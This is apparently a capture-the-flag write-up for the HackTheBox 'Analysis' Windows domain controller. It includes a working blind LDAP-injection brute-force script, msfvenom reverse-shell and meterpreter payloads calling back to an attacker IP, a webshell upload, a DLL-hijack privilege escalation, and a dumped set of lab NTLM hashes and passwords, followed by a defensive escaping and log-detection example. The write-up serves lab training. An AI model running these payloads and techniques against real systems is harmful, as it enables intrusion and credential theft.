Basic Information

Port Scan

Ports 80 and 3306 plus the usual domain-controller ports are open; the domain is analysis.htb:

$ nmap -sC -sV 10.10.11.250
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-22 13:43 CST
Nmap scan report for 10.10.11.250
Host is up (0.14s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-22 05:44:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MySQL (unauthorized)
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-01-22T05:44:29
|_ start_date: N/A
|_clock-skew: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.26 seconds

80

Visiting the IP directly returns a 404, and a directory scan against the bare IP turns up nothing either:

Subdomain Scan

After adding a hosts entry, a subdomain scan finds internal:

10.10.11.250 analysis.htb

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://analysis.htb/" -H 'Host: FUZZ.analysis.htb'

[Status: 403, Size: 1268, Words: 74, Lines: 30, Duration: 134ms]
* FUZZ: internal

internal

After adding that to hosts as well, visiting it gives an IIS 403 this time:

(It is in French, which is a nuisance; how did HTB accept a French-language machine?)


Directory Scan

Running a directory scan against internal turns up a few files; the dashboard itself contains almost nothing:

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://internal.analysis.htb/
/dashboard (Status: 301) [Size: 174] [--> http://internal.analysis.htb/dashboard/]
/employees (Status: 301) [Size: 174] [--> http://internal.analysis.htb/employees/]
/users (Status: 301) [Size: 170] [--> http://internal.analysis.htb/users/]

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://internal.analysis.htb/dashboard/
/css (Status: 301) [Size: 178] [--> http://internal.analysis.htb/dashboard/css/]
/img (Status: 301) [Size: 178] [--> http://internal.analysis.htb/dashboard/img/]
/index.php (Status: 200) [Size: 38]
/js (Status: 301) [Size: 177] [--> http://internal.analysis.htb/dashboard/js/]
/lib (Status: 301) [Size: 178] [--> http://internal.analysis.htb/dashboard/lib/]
/uploads (Status: 301) [Size: 182] [--> http://internal.analysis.htb/dashboard/uploads/]

# The site is PHP, so rescan dashboard with the php extension
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://internal.analysis.htb/dashboard/ -x php
/details.php (Status: 200) [Size: 35]
/emergency.php (Status: 200) [Size: 35]
/form.php (Status: 200) [Size: 35]
/index.php (Status: 200) [Size: 38]
/logout.php (Status: 302) [Size: 3] [--> ../employees/login.php]
/tickets.php (Status: 200) [Size: 35]
/upload.php (Status: 200) [Size: 0]

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://internal.analysis.htb/users/ -x php
/list.php (Status: 200) [Size: 17]

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://internal.analysis.htb/employees/ -x php
/Login.php (Status: 200) [Size: 1085]
/login.php (Status: 200) [Size: 1085]

employees

Login required:

users

Accessing it directly complains about a missing parameter, so the next step is to probe for parameter names:

Parameter enumeration finds name:

technician

Simply setting name to an asterisk reveals technician.

LDAP Injection

What is actually happening here is LDAP injection:

names

Using the LDAP injection on the name parameter, the other usernames can be listed (not needed for now):

technician
amanson
jangel
badam
lzen
cwilliams
webservice
jdoe
soc_analyst
wsmith
svc_web

Description

Since this is a Windows machine, the routine next step is to check the Description attribute, extracting it from the difference between responses:

Eventually this yields the technician password (the real value contains special characters, which is a pitfall to watch for):

97nttl*4qp96bv

ldap.py

A script written by a teammate; because of the special character in the middle, it brute-forces the value in two parts:

import requests
import logging as log
import string

log.basicConfig(level=log.DEBUG, format="%(message)s")

# Injected into the name parameter: closes the original term and adds a
# Description=<guess>* condition, so the response leaks one character at a time.
PREFIX = "technician)(Description="
CHECK_NAME = "technician"


def check_data(data):
    """Send one guess; True means the injected filter still matched technician."""
    log.debug(f"Checking: {data}")
    r = requests.get(f"http://internal.analysis.htb//users/list.php?name={PREFIX}{data}")
    if "</table>" == r.text:
        # Empty table: the filter was valid but matched nothing
        log.debug(f"Error: {data}")
        return False
    elif CHECK_NAME in r.text:
        log.debug(f"Success: {data}")
        return True
    else:
        log.debug(f"False: {data}")
        return False


# Candidate characters; LDAP filter metacharacters are backslash-escaped
WORDARRAY = list(string.ascii_letters + string.digits)
WORDARRAY.append(r"\=")
WORDARRAY.append(r"\*")
WORDARRAY.append(r"\#")
WORDARRAY.append("{")
WORDARRAY.append("}")
WORDARRAY.append(r"\(")
WORDARRAY.append(r"\)")


def check_append():
    """Grow the value from the left: known prefix + guess + wildcard."""
    result = ""
    while True:
        for i in WORDARRAY:
            if check_data(result + i + "*"):
                result += i
                log.debug(f"Result: {result}")
                break
        else:
            # No candidate matched: reached the literal '*' or the end
            break
    return result


def check_prepend():
    """Grow the value from the right: wildcard + guess + known suffix."""
    result = ""
    while True:
        for i in WORDARRAY:
            if check_data("*" + i + result):
                result = i + result
                log.debug(f"Result: {result}")
                break
        else:
            break
    return result


def main():
    log.info(check_prepend())
    log.info(check_append())


if __name__ == "__main__":
    main()
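
The fix for the bug the script above exploits, and a log check for it, as an added example (not the writeup's or the machine's code): escaping the name value per RFC 4515 before it enters the filter, so the `technician)(Description=9*` payload can only match literally, plus a scan of NCSA-style lines like those in u_ncsa1.log for name values carrying filter metacharacters. The filter layout in build_filter_* is an assumption (the real list.php source is not on the page), and the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# RFC 4515: characters with filter meaning become backslash + two hex digits.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Encode an untrusted value so the filter can only match it literally."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(name: str) -> str:
    # Raw concatenation: the shape of the bug behind list.php?name=
    # (assumed layout; the real list.php filter is not on the page).
    return f"(&(objectClass=user)(sAMAccountName={name}))"


def build_filter_safe(name: str) -> str:
    return f"(&(objectClass=user)(sAMAccountName={escape_filter_value(name)}))"


def filter_attributes(ldap_filter: str) -> list:
    """Attribute names the directory would actually evaluate in this filter."""
    return re.findall(r"\(([A-Za-z][\w-]*)=", ldap_filter)


# Detection side: constructed NCSA-style lines modelled on u_ncsa1.log.
SAMPLE_LOG = [
    '10.10.16.12 - - [22/Jan/2024:13:50:01 +0800] "GET /users/list.php?name=jdoe HTTP/1.1" 200 210',
    '10.10.16.12 - - [22/Jan/2024:13:50:02 +0800] "GET /users/list.php?name=* HTTP/1.1" 200 1408',
    '10.10.16.12 - - [22/Jan/2024:13:50:03 +0800] "GET /users/list.php?name=technician)(Description=9* HTTP/1.1" 200 210',
    '10.10.16.12 - - [22/Jan/2024:13:50:04 +0800] "GET /dashboard/index.php HTTP/1.1" 200 38',
]
_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_name_values(lines) -> list:
    """Return name= values sent to list.php that carry LDAP filter metacharacters."""
    hits = []
    for line in lines:
        m = _REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/users/list.php"):
            continue
        for value in parse_qs(url.query).get("name", []):
            if any(ch in value for ch in "*()\\"):
                hits.append(value)
    return hits
```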

dashboard

The credentials obtained log into the dashboard:

technician@analysis.htb
97nttl*4qp96bv

webshell

The SOC report form then accepts a webshell upload directly; the path is the uploads directory seen earlier:

msfvenom -p php/reverse_php LHOST=10.10.16.12 LPORT=4444 -f raw > shell.php
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.16.12 LPORT=4444 -f raw > shell.php

http://internal.analysis.htb/dashboard/uploads/shell.php

The webshell drops quickly, so use it to load a regular reverse shell:

Information

Going through the files, C:\inetpub\internal\users\list.php yields the webservice credentials:

$ldap_password = 'N1G6G46G@G!j';
$ldap_username = 'webservice@analysis.htb';
$ldap_connection = ldap_connect("analysis.htb");

Routine enumeration also turns up the jdoe password:

Automated enumeration tools all pick this up; manually, query the registry directly:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
jdoe
7y4Z4^*y9Zzj

(Another way is to get the jdoe password from the file C:\inetpub\logs\LogFiles\W3SVC2\u_ncsa1.log.)

PS C:\inetpub\logs\LogFiles\W3SVC2> findstr alert_panel.php u_ncsa1.log

user flag

Log in as jdoe; the user flag is on the desktop:

evil-winrm -i 10.10.11.250 -u jdoe -p "7y4Z4^*y9Zzj"

Unintended root

Definitely unintended: the web user can write a DLL directly into C:\Snort\lib\snort_dynamicpreprocessor, a DLL hijack:

msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=10.10.16.12 LPORT=4444 -o sf_engine.dll

*Evil-WinRM* PS C:\Snort\lib\snort_dynamicpreprocessor> upload sf_engine.dll

hashdump

meterpreter > hashdump
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:584d96946e4ad1ddfa4f8d7938faf91d:::
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8549ecd32b0253e9894a422299fe2466:::
jdoe:1103:aad3b435b51404eeaad3b435b51404ee:190193db2c6c6d69c60cf5af64447ce0:::
soc_analyst:1104:aad3b435b51404eeaad3b435b51404ee:d6f020bbee8043520eb569e540913bd4:::
cwilliams:1105:aad3b435b51404eeaad3b435b51404ee:ce88373ebd6d687eac0a405734a266aa:::
technician:1106:aad3b435b51404eeaad3b435b51404ee:ce88373ebd6d687eac0a405734a266aa:::
webservice:1107:aad3b435b51404eeaad3b435b51404ee:780b446d7d76a85880ce49a387f18642:::
wsmith:1109:aad3b435b51404eeaad3b435b51404ee:3da4104738938858384180964346fc6c:::
jangel:1110:aad3b435b51404eeaad3b435b51404ee:eea7337a28121aab144ca78fed48fc7e:::
lzen:1111:aad3b435b51404eeaad3b435b51404ee:eea7337a28121aab144ca78fed48fc7e:::
svc_web:2101:aad3b435b51404eeaad3b435b51404ee:cf74f3b0e86e17fba5051e261b9785b2:::
amanson:2103:aad3b435b51404eeaad3b435b51404ee:5d5b796cd37d9e19d9d1ae10c22ffa78:::
badam:2104:aad3b435b51404eeaad3b435b51404ee:5d5b796cd37d9e19d9d1ae10c22ffa78:::
DC-ANALYSIS$:1000:aad3b435b51404eeaad3b435b51404ee:2ec9198220c4bb7306ba170b7fa007f9:::

References